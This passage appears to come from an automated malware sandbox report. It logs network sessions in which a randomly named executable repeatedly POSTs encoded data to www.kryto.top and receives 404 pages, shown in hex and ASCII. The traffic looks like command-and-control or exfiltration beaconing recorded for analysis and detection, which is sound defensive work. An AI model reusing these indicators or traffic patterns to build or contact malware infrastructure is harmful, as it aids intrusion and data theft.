              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 18, 2024 09:03:44.286324978 CEST224INData Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
              Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transfo
              Sep 18, 2024 09:03:44.286750078 CEST1236INData Raw: 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 30 31 35 30 36 38 37 2c 30 2c 30 2c 31 31 2e 31 39 33 39 32 33 2c 2d 31 2e 33 38 39 35 39 34 35 2c 2d 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c
              Data Ascii: rm="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263
              Sep 18, 2024 09:03:44.286762953 CEST224INData Raw: 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20
              Data Ascii: e-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.5121
              Sep 18, 2024 09:03:44.286787033 CEST1236INData Raw: 35 39 2c 30 2e 31 38 32 35 38 20 63 20 2d 31 2e 39 31 34 36 30 33 2c 2d 30 2e 32 33 36 32 31 20 2d 33 2e 35 30 35 35 39 31 2c 31 2e 31 37 38 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30
              Data Ascii: 59,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.1470
              Sep 18, 2024 09:03:44.286802053 CEST1236INData Raw: 2d 31 33 2e 31 39 37 35 35 35 2c 31 33 2e 33 34 33 33 20 2d 31 38 2e 37 38 31 33 37 39 2c 32 30 2e 30 31 30 34 38 20 2d 35 2e 35 38 33 38 32 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39
              Data Ascii: -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.7
              Sep 18, 2024 09:03:44.286817074 CEST1236INData Raw: 32 32 34 39 38 20 63 20 36 2e 38 39 35 38 36 2c 36 2e 34 35 38 33 36 20 31 33 2e 37 39 31 37 2c 31 32 2e 39 31 36 37 20 31 39 2e 39 38 39 35 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39
              Data Ascii: 22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.2492
              Sep 18, 2024 09:03:44.286833048 CEST1236INData Raw: 39 2c 35 2e 34 32 31 31 38 20 34 2e 31 38 33 38 2c 39 2e 31 39 32 36 32 20 31 2e 31 37 38 36 31 2c 33 2e 37 37 31 34 34 20 32 2e 34 37 34 37 37 2c 39 2e 36 36 33 31 20 31 2e 39 34 34 34 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c
              Data Ascii: 9,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;st
              Sep 18, 2024 09:03:44.286848068 CEST896INData Raw: 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e
              Data Ascii: line;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.
              Sep 18, 2024 09:03:44.286865950 CEST1236INData Raw: 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33
              Data Ascii: -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:m
              Sep 18, 2024 09:03:44.291356087 CEST1236INData Raw: 32 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 32 2e 36 38 37 35 2c 32 36 33 2e 33 34 39 39 38 20 63 20 2d 34 2e 32 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36
              Data Ascii: 29" d="m 132.6875,263.34998 c -4.2289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.657966162.0.213.94803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:46.270148993 CEST785OUTPOST /09dt/ HTTP/1.1
              Host: www.kryto.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 231
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.kryto.top
              Referer: http://www.kryto.top/09dt/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 38 42 6e 4a 49 7a 41 63 30 38 31 55 6e 56 64 41 57 6d 64 45 59 53 30 73 68 54 7a 73 78 6e 53 49 65 33 4b 32 51 38 35 78 4e 48 54 4a 63 64 36 35 55 4a 75 41 34 4c 43 43 4b 6f 77 70 39 71 75 69 62 4a 2b 72 42 6d 67 41 36 42 59 66 37 58 73 32 53 57 64 61 61 41 49 43 47 5a 6d 70 68 6b 44 48 72 6f 6b 7a 44 38 50 45 6f 31 51 54 37 79 59 69 31 44 75 58 53 61 66 4c 5a 51 6c 44 74 41 50 6c 52 6f 4d 55 70 46 48 45 51 63 48 49 6a 66 52 67 70 6e 59 59 54 67 74 78 44 66 55 57 37 65 6e 6d 32 73 52 33 62 42 36 72 55 43 45 2b 69 71 52 65 74 54 50 64 50 55 42 77 3d 3d
              Data Ascii: np=mZ3m6Qa3ZY/2HyGLeI1CQlrG0QhnppC3Vg0jcU+Q6y8BnJIzAc081UnVdAWmdEYS0shTzsxnSIe3K2Q85xNHTJcd65UJuA4LCCKowp9quibJ+rBmgA6BYf7Xs2SWdaaAICGZmphkDHrokzD8PEo1QT7yYi1DuXSafLZQlDtAPlRoMUpFHEQcHIjfRgpnYYTgtxDfUW7enm2sR3bB6rUCE+iqRetTPdPUBw==
              Sep 18, 2024 09:03:46.872869015 CEST1236INHTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:03:46 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 16052
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 18, 2024 09:03:46.872919083 CEST1236INData Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
              Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.015068
              Sep 18, 2024 09:03:46.872936010 CEST1236INData Raw: 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d
              Data Ascii: ,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393p
              Sep 18, 2024 09:03:46.872950077 CEST672INData Raw: 33 35 35 33 33 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 39 2e 38 39 39 34 39 35 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 30 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20
              Data Ascii: 355339" height="9.8994951" width="100.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlim
              Sep 18, 2024 09:03:46.872971058 CEST1236INData Raw: 33 34 33 34 38 39 2c 33 30 2e 32 34 36 37 33 20 39 2e 37 36 30 31 33 32 2c 34 38 2e 36 36 33 34 39 20 34 2e 34 31 36 36 34 32 2c 31 38 2e 34 31 36 37 36 20 39 2e 37 39 38 33 35 36 2c 33 35 2e 39 31 36 37 35 20 31 35 2e 31 38 30 32 36 37 2c 35 33
              Data Ascii: 343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,53.41738" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <p
              Sep 18, 2024 09:03:46.872987032 CEST224INData Raw: 36 34 20 2d 31 2e 31 36 36 34 34 2c 31 39 2e 32 34 39 32 31 20 2d 33 2e 33 35 30 32 2c 33 31 2e 32 34 36 31 39 20 2d 32 2e 31 38 33 37 36 2c 31 31 2e 39 39 36 39 38 20 2d 34 2e 38 31 36 31 36 2c 32 34 2e 33 33 36 33 32 20 2d 38 2e 34 32 30 36 33
              Data Ascii: 64 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.42063,38.99809 -3.60448,14.66177 -8.06212,31.17154 -12.56244,47.83939" style="display:inline;fill:none;stroke:#000000;stroke-width:1px
              Sep 18, 2024 09:03:46.873029947 CEST1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20
              Data Ascii: ;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16
              Sep 18, 2024 09:03:46.873047113 CEST224INData Raw: 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37
              Data Ascii: 6.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78
              Sep 18, 2024 09:03:46.873059988 CEST1236INData Raw: 39 33 34 20 2d 31 2e 32 33 37 33 31 2c 33 34 2e 31 31 35 33 36 20 2d 32 2e 31 38 30 31 34 2c 35 33 2e 36 32 30 31 35 20 2d 30 2e 39 34 32 38 32 2c 31 39 2e 35 30 34 37 38 20 2d 32 2e 30 30 33 34 32 39 2c 33 37 2e 31 38 31 35 39 20 2d 33 2e 30 36
              Data Ascii: 934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.064154,54.86032" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" />
              Sep 18, 2024 09:03:46.873075008 CEST224INData Raw: 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 34 39 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 39 2e 32 35 34 37 38 2c 31 32 34 2e 32 33 32 36 36 20 63 20 2d 35 2e 34 34 30 31 39 32 2c 31
              Data Ascii: path id="path4549" d="m 79.25478,124.23266 c -5.440192,11.56251 -10.880951,23.12622 -15.899657,33.56368 -5.018706,10.43747 -9.614414,19.74672 -11.912808,26.70033 -2.298394,6.95362 -2.298394,11.54922
              Sep 18, 2024 09:03:46.877980947 CEST1236INData Raw: 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39 33 20 32 2e 38 32 38 31 38 32 2c 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33
              Data Ascii: -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:m


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.657967162.0.213.94803196C:\Program Files (x86)\ZXldPjDiskoZbAChBKqZAdPKInkZemyjalJDMXpkPDMQgZWBdolWNgGjZgucEGUbkflfo\SguBfrlSDIFxPr.exe
              TimestampBytes transferredDirectionData
              Sep 18, 2024 09:03:48.813105106 CEST1798OUTPOST /09dt/ HTTP/1.1
              Host: www.kryto.top
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.5
              Content-Length: 1243
              Connection: close
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Origin: http://www.kryto.top
              Referer: http://www.kryto.top/09dt/
              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
              Data Raw: 6e 70 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 45 42 6e 38 63 7a 42 37 67 38 30 55 6e 56 65 41 57 6c 64 45 59 50 30 73 35 66 7a 73 39 52 53 4f 53 33 4c 54 45 38 78 67 4e 48 47 35 63 64 32 5a 55 49 71 41 34 65 43 44 36 73 77 70 74 71 75 69 62 4a 2b 6f 5a 6d 77 46 4f 42 61 66 37 49 34 6d 53 53 57 36 61 73 49 43 76 75 6d 70 30 54 41 32 4c 6f 6b 54 7a 38 4a 6d 51 31 4d 44 37 30 62 69 30 45 75 58 50 61 66 4b 30 68 6c 43 5a 71 50 6e 4e 6f 49 6c 41 75 63 47 51 51 52 75 76 56 46 43 74 53 5a 64 7a 65 6c 51 4c 6a 53 6e 48 73 36 6e 43 30 52 79 61 62 7a 62 4e 31 4f 5a 71 56 61 61 63 34 50 4f 69 47 51 42 71 4b 2f 4b 57 77 76 54 6f 6d 63 31 69 65 31 31 52 4c 52 6e 58 43 34 76 38 4c 7a 56 41 4c 31 63 56 6b 41 4f 6d 6d 78 63 68 72 59 56 34 55 73 71 36 6b 2f 52 4c 72 37 49 66 4e 38 35 34 67 44 4e 53 53 4b 71 6b 41 30 64 51 41 39 41 4b 50 4a 48 36 64 2b 59 6f 6a 2b 52 62 52 4a 67 73 77 38 78 30 69 64 5a 6a 43 45 7a 66 4c 56 7a 57 [TRUNCATED]
              Data Ascii: np=mZ3m6Qa3ZY/2HyGLeI1CQlrG0QhnppC3Vg0jcU+Q6yEBn8czB7g80UnVeAWldEYP0s5fzs9RSOS3LTE8xgNHG5cd2ZUIqA4eCD6swptquibJ+oZmwFOBaf7I4mSSW6asICvump0TA2LokTz8JmQ1MD70bi0EuXPafK0hlCZqPnNoIlAucGQQRuvVFCtSZdzelQLjSnHs6nC0RyabzbN1OZqVaac4POiGQBqK/KWwvTomc1ie11RLRnXC4v8LzVAL1cVkAOmmxchrYV4Usq6k/RLr7IfN854gDNSSKqkA0dQA9AKPJH6d+Yoj+RbRJgsw8x0idZjCEzfLVzWy1pfvXvTplrZ/SMGwnAtjxatDa0h0sw85Vb58ti20pYVJMBetxo3cpPOFz8juvY0LNUlDMOgwLGMpS2M0GJkDr6UEBze4RXkschvNAiTPjHAQq2MBKk1bfib9h3FPhXgBQBjC5JeIxthZYCJqt+UKeMJ82lyXrpow5K7CWKfRD6ts+aBN/m8PDUsuDDH4B2BTEAUw9lYnwc9NkjDn9YenCFqzWY5duz6+onbI0jRHox4SUHyptc/nI7t/WdxufdAeFTcxeZScr3xVe9xL2dVXTrycxQ6tgECNslC1PpsLwkxoQaHyJEYarvq6DQP9g+WeV9H9RgoNMcB1gggDIiQkKvKLJNTTT7CQZgNsCOAU/YC4udGMI1mmhJ+iWkgs45HciIlOHsh2W9fmW4JXBH6DNdS65Xkdi31nMgcNQF2bZGNqBO5jFrrSnP7+GI+Sp4/fbP8eh5905+nDEPK2LiBJVjaYAh6a61xSCV95KGTFJXQdwYCVMeszQDOQv8IQQ7OJ+0iviYPOUZI0F2LzsuHy/NKCntI5fwcdQiOea099cSmIuasQKwmyStkBy+igOPXFIcjmB2VO49mM0u9m4qz9Axi1LJtFdGK7WbjfWWmOYR07Fs0qbHevFBGgk7RJTMJ5ltF9cV0WdP9+R2Cm2uwx470BmYyuFI/A7 [TRUNCATED]
              Sep 18, 2024 09:03:49.478764057 CEST1236INHTTP/1.1 404 Not Found
              Date: Wed, 18 Sep 2024 07:03:49 GMT
              Server: Apache
              X-Frame-Options: SAMEORIGIN
              Content-Length: 16052
              X-XSS-Protection: 1; mode=block
              Connection: close
              Content-Type: text/html
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
              Sep 18, 2024 09:03:49.478785992 CEST1236INData Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
              Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.015068
              Sep 18, 2024 09:03:49.478799105 CEST1236INData Raw: 2c 2d 33 2e 36 37 32 33 38 36 20 2d 31 2e 30 37 34 38 33 38 2c 2d 39 2e 37 36 30 36 35 37 20 2d 30 2e 33 36 31 38 35 2c 2d 37 2e 35 36 34 37 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d
              Data Ascii: ,-3.672386 -1.074838,-9.760657 -0.36185,-7.564779 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393p
